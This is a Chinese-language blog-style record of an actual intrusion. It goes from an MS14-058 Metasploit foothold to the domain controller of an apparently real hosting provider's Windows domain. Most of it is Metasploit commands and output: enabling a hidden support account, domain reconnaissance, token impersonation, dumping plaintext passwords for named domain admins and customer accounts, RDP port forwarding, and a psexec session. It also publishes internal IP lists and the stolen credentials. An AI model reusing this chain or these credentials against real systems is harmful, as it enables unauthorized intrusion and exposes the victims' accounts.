记一次MS14-058到域控实战记录

• User：SUPPORT_388945a0
• Pass：7a57a5a743894a0e

msf exploit(ms14_058_track_popup_menu) > use post/windows/manage/enable_support_account msf post(enable_support_account) > set password 7a57a5a743894a0e msf post(enable_support_account) > set session 2 msf post(enable_support_account) > exploit [*] Target OS is Windows .NET Server (Build 3790, Service Pack 2). [*] Harvesting users... [+] Found SUPPORT_388945a0 account! [*] Target RID is 1004 [*] Account is disabled, activating... [*] Swapping RIDs...! [*] Setting password to 7a57a5a743894a0e [*] Post module execution completed 用于远程桌面连接的3389端口被管理员修改过了，根据经验猜测3392应该是修改后的端口号，在远程连接界面看到存在域，说明这台机器在HOSTING域内。 Webshell执行域信息搜集相关命令时会提示：System error 5 has occurred . Access is denied . 。访问被拒绝，权限问题。 ipconfig /all //网卡配置信息，所属域以及IP段 ping backbox //显示该机器名的IP net view //显示当前域中的计算机列表 net view /domain //查看有多少个域 net user /domain //获取所有域用户列表 net group /domain //获取域用户组信息 net group "domain admins" /domain //获取当前域管理员 net time /domain //域服务器一般也做时间服务器 dsquery server //查看域控服务器 dsquery subnet //查看域IP地址范围 因为meterpreter会话2里已经是SYSTEM权限了，所以可以用shell命令进入DOS命令行下执行以下命令搜集域信息，缺图。 msf post(enable_support_account) > sessions -i 2 [*] Starting interaction with 2... meterpreter > shell Process 13204 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>net group "domain admins" /domain net group "domain admins" /domain The request will be processed at a domain controller for domain hosting.lunarpages.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- _new_win_user abbas.khan akumar alexb alext brianl dgreathouse dimitriosk epak gcager gudiyak iismon Jassi jayraju jmickle lunarscripts mike mwaqas richardd robotdoggy rodb Tsinternetuser vartamonov vlaszlo zafril The command completed successfully. 使用dsquery server命令查询域控制器中有一个PHART，在域信息搜集时也发现HOSTING域内有一台计算机名为PHART的机器，所以这台机器应该是域控服务器，对应的IP地址为：172.16.17.208。 c:\windows\system32\inetsrv>dsquery server "CN=THART,CN=Servers,CN=Sandiego,CN=Sites,CN=Configuration,DC=hosting,DC=lunarpages,DC=com" "CN=PHART,CN=Servers,CN=Sandiego,CN=Sites,CN=Configuration,DC=hosting,DC=lunarpages,DC=com" ====== Domain:HOSTING（域内机器）====== \\ARCTURUS = [172.16.17.176] \\BASH = [172.16.17.197] \\BLAMO = [172.16.17.112] \\CASTOR = [172.16.19.62] \\CELANEO = [172.16.17.221] \\CEPHEI = [172.16.17.177] \\INDUS = [172.16.18.30] \\KENDAL-NEW = [172.16.16.55] \\KRAZ = [216.***.***.207] \\PHART = [172.16.17.208] \\RAPTOR = [172.16.17.199] \\REGOR = [216.***.***.206] \\ROCKET = [172.16.16.120] \\SM-MAIL2-N14 = [172.16.19.129] \\SMARTERMAIL1 = [172.16.16.129] \\TRESSA = [216.**.***.9] \\TUB = [172.16.19.72] \\VOGA = [67.***.***.33] \\VPSSQL12 = [172.16.18.169] \\YED = [216.***.***.203] 加载incognito扩展，它可以用来盗窃目标主机令牌和假冒用户，列出目标主机可用令牌，可以看到有2个域管帐号：HOSTING\dimitriosk，HOSTING\richardd。 meterpreter > use incognito iLoading extension incognito...success. meterpreter > list_tokens -u Delegation Tokens Available ======================================== NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM TRESSA\codeb7 TRESSA\IWAM_plesk(default) TRESSA\IWPC_10(techb7) TRESSA\IWPC_112(techn56) TRESSA\IWPC_120(csbelts2) ...... Impersonation Tokens Available ======================================== HOSTING\dimitriosk HOSTING\richardd NT AUTHORITY\ANONYMOUS LOGON TRESSA\IUSR_baffledcomics23 TRESSA\IUSR_bridgca TRESSA\IUSR_canva4 TRESSA\IUSR_cellu12 ...... 接着我们使用mimikatz法国神器直接就能获取到了这2个域管帐号的明文密码，缺图。 meterpreter > wdigest [+] Running as SYSTEM [*] Retrieving wdigest credentials wdigest credentials =================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;54487 NTLM 0;141544 NTLM TRESSA IWPD_323(jielu0) 1pDH4 0;146820 NTLM TRESSA IWPD_276(codeb7) 2FRj# 0;150429 NTLM TRESSA psaadm 2a 00 6d 00 48 00 6a 00 40 bc 0;146362 NTLM TRESSA IWPD_73(birch11) 2a)hx 0;145281 NTLM TRESSA IWPD_404(apsns0) 2i!@! 0;999 Negotiate HOSTING TRESSA$ 37 9f 4f db ad 52 cf a4 1b 0e f7 c0 33 ad 6c 6a f9 5a 21 aa 57 e3 33 42 b7 2a b3 52 0;996 Negotiate NT AUTHORITY NETWORK SERVICE 37 9f 4f db ad 52 cf a4 1b 0e f7 c0 33 ad 6c 6a f9 5a 21 aa 57 e3 33 42 b7 2a b3 52 0;143168 NTLM TRESSA IWPD_130(leopo1) A^Xku 0;150476 NTLM TRESSA IWPD_390(myp3n0) AehD8 0;50614744 Kerberos HOSTING richardd B0unc3d 0;87605279 Kerberos HOSTING richardd B0unc3d 0;143575 NTLM TRESSA IWPD_231(rmhar0) BARrc 0;150196 NTLM TRESSA IWPC_184(e2esoft0) C9rFi 0;1669440 NTLM TRESSA Plesk Administrator HOB.5Sd3X88C610rxYL/06.U0UbihUoU 0;148004 NTLM TRESSA IWPD_413(manuf5) I1)cd 0;147957 NTLM TRESSA IWPD_375(cellu12) I6oS) 0;63839802 Kerberos HOSTING dimitriosk TsAk1553!@# 0;56964817 Kerberos HOSTING dimitriosk TsAk1553!@# 0;143880 NTLM TRESSA IWPD_179(ringb2) U&RQo 0;144397 NTLM TRESSA IWPD_427(temp02) Uj$Da 0;49263709 NTLM TRESSA SvcCWRSYNC XgXS0fJkki1120 0;49609545 NTLM TRESSA SvcCWRSYNC XgXS0fJkki1120 0;147191 NTLM TRESSA IWPD_334(egorov0) agA+L 0;147850 NTLM TRESSA IWPD_399(smash11) btj#c 0;82470376 NTLM TRESSA codeb7 codebroker1 0;145375 NTLM TRESSA IWPD_48(obser14) d(nlK 0;144068 NTLM TRESSA IWPD_302(donas0) d-1!j 0;56760168 NTLM TRESSA robotdoggy xhn?O8kx!K 0;87616530 NTLM TRESSA robotdoggy xhn?O8kx!K 0;149472 NTLM TRESSA IWPD_290(expos12) xula) 0;147761 NTLM TRESSA IWPD_417(marig4) yy=^( ...... 域控服务器的IP地址、帐号密码都到手了，接下来就是使用meterpreter的portfwd命令进行端口转发并连接进入域控服务器就行了，域控服务器的远程桌面连接端口也改为了3392。 这里笔者在测试时是可以成功登录到域控服务器及域控下的所有机器，这里就不再截图了。 meterpreter > portfwd add -l 1234 -r 172.16.17.208 -p 3392 [*] Local TCP relay created: 0.0.0.0:1234 <-> 172.16.17.208:3392 meterpreter > portfwd delete -l 1234 //删除 0x03 一处问题测试 原笔者想直接通过Metasploit下的exploit/windows/smb/psexec模块使用其中一个域管理员进行批量登录测试的，但是在测试过程中发现总是会出现 以下报错信息。 msf exploit(psexec) > exploit [*] Started reverse handler on 192.168.1.10:443 [*] Connecting to the server... [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (172.16.17.208:445). 通过在本地2008虚拟机中测试发现，开启Windows防火墙时使用psexec模块返回的就是这个报错。用DOS命令（net stop "Windows Firewall"）停止防火墙服务依旧提示一样的报错，但将Windows防火墙关闭后即可成功得到会话，重新启用防火墙后又会断开会话 ～.~ 。 msf exploit(handler) > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/bind_tcp msf exploit(psexec) > set SMBUSER administrator msf exploit(psexec) > set SMBPASS windows****!@#123 msf exploit(psexec) > set RHOST 192.168.1.9 msf exploit(psexec) > set LPORT 4444 msf exploit(psexec) > exploit [*] Started bind handler [*] Connecting to the server... [*] Authenticating to 192.168.1.9:445|WORKGROUP as user 'administrator'... [*] Uploading payload... [*] Created \TFPRuonH.exe... [+] 192.168.1.9:445 - Service started successfully... [*] Deleting \TFPRuonH.exe... [*] Sending stage (770048 bytes) to 192.168.1.9 [*] Meterpreter session 6 opened (192.168.1.10:60880 -> 192.168.1.9:4444) at 2014-12-29 20:12:56 +0800